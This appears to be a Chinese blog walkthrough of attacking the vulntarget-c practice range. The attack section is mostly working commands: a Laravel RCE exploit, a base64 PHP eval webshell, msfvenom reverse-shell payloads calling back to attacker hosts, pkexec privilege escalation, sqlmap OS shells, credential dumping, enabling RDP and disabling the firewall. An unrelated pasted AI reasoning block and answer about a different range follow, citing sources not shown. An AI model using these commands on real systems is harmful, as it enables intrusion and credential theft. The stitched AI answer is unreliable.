vulntarget-c靶场内网渗透

1. 环境搭建

2.对ubuntu20的渗透

 对其进行端口扫描

访问80端口

发现是laravel框架。版本是v8.78.1

使用 kaili 自带的msf 进行渗透

search laravel

use exploit/multi/php/ignition_laravel_debug_rce

执行利用完成检测

上传木马

先将木马进行base64编码

<?php @eval($_POST[1]); ?>
PD9waHAgQGV2YWwoJF9QT1NUWzFdKTsgPz4=

上传

echo "PD9waHAgQGV2YWwoJF9QT1NUWzFdKTsgPz4="|base64 -d >shell.php

访问看是否成功

使用蚁剑连接

使用msf上线

生成msf木马

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=172.16.6.45 LPORT=4444 -f elf -o /home/kali/Desktop/ttt.elf

将木马放入Ubuntu20的webshell中

msf设置监听

use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
show options 
exploit

进行提权

使用msf自带工具,收集可以用于提权的模块

run post/multi/recon/local_exploit_suggester

use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
set session
exploit

添加代理

建立路由

run autoroute -p     #查看路由信息
run post/multi/manage/autoroute  #⾃动添加路由

添加socks代理

use auxiliary/server/socks_proxy

信息收集

ip a

上传fscan 进行扫描

upload /home/kali/Desktop/fscan.exe /tmp

./fscan -h 10.0.20.0/24 -np -no -nopoc

3.内网机器渗透

发现主机:10.0.20.100,开放有80端口

登录后台,尝试弱口令,admin/admin123

发现sql注入

sqlmap检测

proxychains sqlmap -u "http://10.0.20.100/admin/?page=appointments/view_details&id=6" -p id --batch

使用sqlmap获取shell

绝对路径

proxychains sqlmap -u "http://10.0.20.100/admin/?page=appointments/view_details&id=6" -p id --os-shell

写入webshell

msf上线

使用免杀

生成msf木马

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.20.141 LPORT=4444 -f py -o shellcode_64.py

设置监听

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.0.20.141
run

信息收集

arp -a

发现10.0.10.100

利用kiwi模块抓取hash

load kiwi
creds_all

解密:https://www.somd5.com/

rdp连接

开启3389端口

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

关闭防火墙

netsh advfirewall set allprofiles state off

远程连接

4. 第二层内网渗透

查找到账号密码

用户:vulntarget
密码:vuln@qwe

利用sudo提权

sudo -l     
sudo su

<think>好的,我需要帮助用户查找关于应急响应 vulntarget 配置 j-02 的相关信息。首先,用户提到的vulntarget系列似乎是用于模拟勒索病毒攻击的应急响应靶场环境,例如引用[1]中提到的vulntarget-n,引用[3]提到的vulntarget-k-03。但用户询问的是j-02,这可能在现有的引用中没有直接提到。 接下来,我需要检查现有的三个引用内容是否有任何与j-02相关的线索。引用[1]主要描述vulntarget-n的案例,涉及阿里云环境被勒索攻击的情况。引用[2]讨论了应急响应中的数据库和漏洞口令检索,以及工具箱的重要性,但没有具体提到j-02。引用[3]提到了vulntarget-k-03,分析了通过日志定位攻击时间的方法。 由于现有引用中没有明确提到j-02,可能需要根据vulntarget系列的一般特征来推断。例如,vulntarget靶场通常模拟真实攻击场景,包含被加密的文件、日志分析、入侵痕迹排查等。配置j-02可能涉及类似的组件,比如Web应用漏洞、SSH或Redis服务的配置问题,如引用[3]中提到的.ssh和redis.log分析。 此外,用户可能需要检查配置文件中的特定漏洞或攻击路径。根据引用[2],第三方应用的安全配置和口令安全是关键点,所以j-02可能涉及弱口令或未修复的漏洞,例如Redis未授权访问,这可能导致攻击者入侵并部署勒索病毒。 总结来说,虽然没有直接的j-02信息,但可以建议用户按照vulntarget系列的通用的应急响应步骤进行排查:检查日志文件(如系统日志、应用日志)、分析异常进程、检查开放端口和服务配置,尤其是涉及数据库或远程访问的服务。同时参考已有的案例方法,比如引用[3]中的时间戳分析,可能帮助定位攻击时间点。 最后,建议用户查阅官方文档或社区资源,获取vulntarget各版本的具体配置信息,或者联系相关平台的支持团队,以确认j-02的具体场景和配置细节。</think>关于**应急响应 vulntarget 配置 J-02**的相关信息,目前公开资料中未直接提及该特定版本的详细配置。但根据现有 vulntarget 系列靶场的设计逻辑和引用内容,可推断以下关键点及排查方向: --- ### 一、vulntarget 系列靶场通用特征 1. **模拟勒索攻击场景** 通常包含被加密的文件(如`.vulntarget`扩展名)、异常进程、日志篡改等痕迹,需通过日志分析、文件恢复、入侵路径追踪进行响应[^1]。 2. **依赖第三方服务漏洞** 如 Redis 未授权访问、SSH 弱口令等,攻击者可能通过此类漏洞植入恶意程序或加密文件[^3]。例如: - 检查 Redis 日志中异常操作时间点:`redis.log`中的`DB loaded from disk`时间戳可定位攻击时间。 - 排查 SSH 登录记录:`.ssh`目录的修改时间与日志中的登录事件关联分析。 3. **应急取证工具箱需求** 需结合自动化工具(如日志分析脚本、内存取证工具)和人工排查,快速定位攻击入口点和影响范围[^2]。 --- ### 二、针对配置 J-02 的可能排查方向 1. **日志文件分析** - 系统日志:`/var/log/auth.log`(SSH 登录记录)、`/var/log/syslog`(服务异常) - 应用日志:Web 服务(如 Apache/Nginx)、数据库(MySQL/Redis)日志中的异常请求或未授权操作。 2. **服务配置检查** - **Redis 配置**:是否启用密码认证、绑定 IP 限制(参考 vulntarget-k-03 的 Redis 漏洞利用场景)。 - **SSH 配置**:是否禁用 root 登录、是否使用强口令(引用[2]提到口令检索的重要性)。 3. **文件系统痕迹** - 查找加密文件(如`.vulntarget`扩展名)及对应的加密进程残留。 - 检查定时任务(`crontab -l`)或启动项中的可疑脚本。 --- ### 三、推荐工具与方法 1. **漏洞扫描与口令爆破检测** 使用工具如 `hydra` 或 `Nmap` 检测开放端口的弱口令风险[^2]。 2. **时间线分析** 通过 `find` 命令结合 `-mtime` 或 `-newermt` 参数,按时间筛选被篡改文件(如引用[3]中通过修改日期定位攻击时间)。 ```bash find / -name "*.vulntarget" -mtime -1 # 查找24小时内被加密的文件 ``` 3. **内存取证** 使用 `Volatility` 分析内存转储,提取恶意进程或网络连接记录。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值